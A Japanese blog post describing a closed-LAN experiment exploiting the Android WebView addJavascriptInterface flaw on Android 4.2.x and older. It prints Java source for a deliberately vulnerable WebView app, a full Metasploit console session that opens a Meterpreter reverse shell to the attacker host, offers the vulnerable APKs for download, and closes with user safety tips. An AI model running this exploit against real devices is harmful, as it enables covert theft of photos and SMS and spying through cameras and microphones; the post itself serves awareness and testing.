Metasploit」タグアーカイブ

実験してみました!Android 4.2.x以下のAndroid端末(スマホやタブレット)は本当にやばいです!

ここのリンクにもあるように、Android 4.2.x以下のAndroid端末のAndroid全端末に占める割合は約50%です。50%のAndroid端末の台数は膨大な数になります。数億台?そしてこれら50%の端末に潜在する可能性のある脆弱性(*1)について実験してみました。
結果は、手近にあったAndroid端末4台中2台に脆弱性が残っており、「端末に保存されている画像入手は当たり前。アプリに対するパーミッションによっては端末内蔵カメラによるスナップ撮影も可能」という結果になりました。

*1:Attacks on Android WebViews

どういう端末が危ないか

1.Android 4.2.x(APIは17)以下のOSを搭載するAndroid端末
2.WebViewクラスを使用したアプリをインストールして起動
3.インタネットへのアクセスを許可

これだけで、端末内に保存されている写真や音声やSMSを抜かれる可能性があります。

さらに、

4.カメラ、マイク、連絡先、SMSなどへのアクセスを許可

などしていると、場合によっては内蔵カメラで写真を撮られたり、マイクで録音されたり、SMS送信されたりしてしまう可能性があります。

なので上記2のWebViewクラスを使用したアプリが、「悪意のある」アプリの場合本当にやばいと思われます

実験内容

1.アプリ作成
Java言語でWebViewクラスを宣言した50行ほどのコードにインタネットアクセス許可をつけただけのスマホアプリ(vulnWebView.apk)を作成。またカメラ等へのアクセスを実験するため、カメラ、マイク、SMS、カレンダ、連絡先へのパーミッションをつけた別バージョンのスマホアプリ(vulnWebViewAll.apk)も作成

2.侵入ホストにて端末からのアクセスを待機
侵入テスト用Frameworkである「Metasploit」から脆弱性をついたExploitを使用して、Android端末上で上記スマホアプリが実行されるのを待機

3.端末上でアプリ実行
Android端末に上記スマホアプリをインストールして実行。(HOMEPAGEやSDCARDや共有フォルダ経由などなんでもよい)ダウンロードしてインストール

4.侵入ホストより侵入
脆弱性の条件が合って接続できれば、画像や音声等のデータを入手してみるさらに端末内蔵のカメラでスナップ撮影。マイクからの録音も。

ターゲット環境

・HTC Butterfly J:os4.1.1
・SonyTabletS:os4.0.3
・GalaxyS3Progre:os4.1.2
・ArrowsNX_F_01F:os4.2.2
・全端末はLAN接続

侵入ホスト環境

・VMWare(7.1.0 build-2496824) on Win7 Home Premium Edition
・Kali Linux3(CD-ROM)でインストール後UpdateおよびUpgrade完了。GitHubによる最新化はしていない
・Metasploit Framework Version: 4.11.3-2015062101
(msfconsoleのバージョン表示から)
・ターゲット端末と同じLANに接続

WebViewクラス使用アプリの作成

GitHubに実験用のJavaソース(というよりproject)が公開されており、それを使って実験してみました。ただそのままではうまく動作せず、下記に従いコードを変更しました。

変更点1:LoadUrlの呼び出しではPORTを陽に指定する必要があること
変更点2:処理途中にRedirectがありその場合にWebViewではなく通常のブラウザが呼ばれてしまいうまく動作しない。それを防ぐコードを追加したこと
変更点3:侵入端末への接続情報、すなわちIPアドレス、ポート番号、およびURIをアプリから指定できるようにしてあります。

package com.krasavkana.vulnwebview;

import android.os.Bundle;
import android.annotation.SuppressLint;
import android.app.Activity;
import android.view.Menu;
import android.view.View;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import android.widget.Button;
import android.widget.EditText;

@SuppressLint("SetJavaScriptEnabled")
public class MainActivity extends Activity {

private static EditText edittext1;
private static EditText edittext2;
private static EditText edittext3;
private static WebView myWebView;

@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);

final Button button = (Button) findViewById(R.id.button1);

// set LHOST 192.168.1.30
edittext1 = (EditText) findViewById(R.id.edittext1);
// set SVRPORT 8080
edittext2 = (EditText) findViewById(R.id.edittext2);
// set URIPATH /aaaaaaaa
edittext3 = (EditText) findViewById(R.id.edittext3);

myWebView = (WebView) findViewById(R.id.webView1);

// not a good idea!
WebSettings webSettings = myWebView.getSettings();
webSettings.setJavaScriptEnabled(true);

// terrible idea!
myWebView.addJavascriptInterface(new WebAppInterface(this), "Android");

myWebView.setWebViewClient(new WebViewClient(){
@Override
public boolean shouldOverrideUrlLoading(WebView view, String url) {
return super.shouldOverrideUrlLoading(view, url);
}
});

// woot.
//myWebView.loadUrl(edittext.getText().toString());

button.setOnClickListener(new View.OnClickListener() {
public void onClick(View v) {
// Perform action on click
loadUrl();
}
});

}

@Override
public boolean onCreateOptionsMenu(Menu menu) {
// Inflate the menu; this adds items to the action bar if it is present.
getMenuInflater().inflate(R.menu.main, menu);
return true;
}

private void loadUrl() {
String uri="http://"+edittext1.getText().toString()+":"+edittext2.getText().toString()+edittext3.getText().toString();
myWebView.loadUrl(uri);
// myWebView.reload();
}

}

実験結果

・HTC Butterfly J(os4.1.1):侵入NG(条件のうちvuln_testがFalseで合わないらしい)
・SonyTabletS(os4.0.3):侵入NG(ただし条件は合うようだ)
・GalaxyS3Progre(os4.1.2):侵入OK。カメラへのアクセス許可があればスナップ撮影が可能
・ArrowsNX_F_01F(os4.2.2):侵入OK。カメラへのアクセス許可があってもスナップ撮影は不可。
マイクによる音声入力は長いもの(60秒)は不可

以下は、GalaxyS3Progreに侵入テストしたときのコンソール画面です。

root@kali:~# msfconsole

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt

Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use android/browser/webview_addjavascriptinterface
msf exploit(webview_addjavascriptinterface) > set LPORT 192.168.1.30
LPORT => 192.168.1.30
msf exploit(webview_addjavascriptinterface) > set URIPATH /aaaaaaaa
URIPATH => /aaaaaaaa
msf exploit(webview_addjavascriptinterface) > set VERBOSE true
VERBOSE => true
msf exploit(webview_addjavascriptinterface) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.30:4444 
[*] Using URL: http://0.0.0.0:8080/aaaaaaaa
[*] Local IP: http://192.168.1.30:8080/aaaaaaaa
[*] Server started.
msf exploit(webview_addjavascriptinterface) > 
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - No cookie received, resorting to headers hash.
[*] 192.168.1.108    webview_addjavascriptinterface - Gathering target information.
[*] 192.168.1.108    webview_addjavascriptinterface - Sending HTML response.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Info receiver page called.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Received cookie 'oZbIEOhlGk'.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Received sniffed browser data over POST: 
{"os_name"=>["Android"], "os_vendor"=>["undefined"], "os_device"=>["undefined"], "ua_name"=>["Safari"], "ua_ver"=>["4.0"], "arch"=>["armle"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["null"], "vuln_test"=>["true"]}.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Received cookie 'oZbIEOhlGk'.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Serving exploit to user with tag oZbIEOhlGk
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Setting target "oZbIEOhlGk" to :tried.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Comparing requirement: source=script vs source=script
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Comparing requirement: os_name=(?-mix:^(?:Google )?Android) vs os_name=Android
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Comparing requirement: vuln_test=true vs vuln_test=true
[*] 192.168.1.108    webview_addjavascriptinterface - Serving armle exploit...
[*] Sending stage (45338 bytes) to 192.168.1.108
[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 192.168.1.108:44195) at 2015-06-28 15:49:42 -0700

msf exploit(webview_addjavascriptinterface) > sessions

Active sessions
===============

  Id  Type                      Information  Connection
  --  ----                      -----------  ----------
  1   meterpreter java/android   @ localhost  192.168.1.30:4444 -> 192.168.1.108:44195 (192.168.1.108)

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: /data/data/com.krasavkana.vulnwebview
==============================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  11768  fil   2015-06-28 15:49:41 -0700  abaeJ.dex
40666/rw-rw-rw-   4096   dir   2015-06-28 15:49:37 -0700  cache
40666/rw-rw-rw-   4096   dir   2015-06-28 15:49:37 -0700  databases
40444/r--r--r--   4096   dir   2015-06-28 15:49:14 -0700  lib

meterpreter > pwd
/data/data/com.krasavkana.vulnwebview
meterpreter > cd ..
meterpreter > pwd
/data/data

実験で使ったAPKファイル

掲載不要かもしれませんが、自分でも実験したり侵入テストしてみたりしたい方のために、今回作成したWebView使用アプリのAPKファイルを置いておきます。IPアドレス、ポート、サーバのURIを変更できる設計にしましたので、ここで実験したことが再現できると思います。ただくれぐれもLAN等閉鎖されたところで実験してください。

インタネットアクセスのみのVunWebView.apk
インタネットアクセスの他カメラ、マイク、カレンダ、連絡先、SMSへのアクセスを許可するVunWebView.apk

因みに、GooglePlayに出している(*2)Androidアプリが数点あるのですが、そのうち1点がWebViewクラスを使用しています。心配になったので、LoadUrlメソッドで呼び出しているURIに、ここで使った侵入ホストを指定して実験してみましたが、脆弱性がつけなかったのか侵入できませんでした。理由はaddJavascriptInterfaceメソッドを使っていないからだと思っています。

*2:実はつい最近ですが、GooglePlayから削除されていることが判明しました。Googleからデベロッパ宛にPolicy変更等の通知が来るのですが、暫くの間見れないことがあって、その間に期限切れになり、結果「削除」になってしまったようです。

他の脆弱性について

今回の実験で使用した脆弱性の他にも、さまざまな脆弱性が発見されており、アンチウイルスのメーカ等と侵入者とのいたちごっこが続いています。

私たちエンドユーザとしては、

・OSはできるだけUpdateをすること、
・怪しいアプリはインストールしないこと、
・重要な情報は端末に残さないか暗号化しておく、

などができ得る対策ですが、十分に気をつけましょう。

関連する記事・ページ

お世話になったリンク

Attacks on Android WebViews
rapid7/metasploit-framework
WebViewのリダイレクト時のブラウザ起動防止
以上です。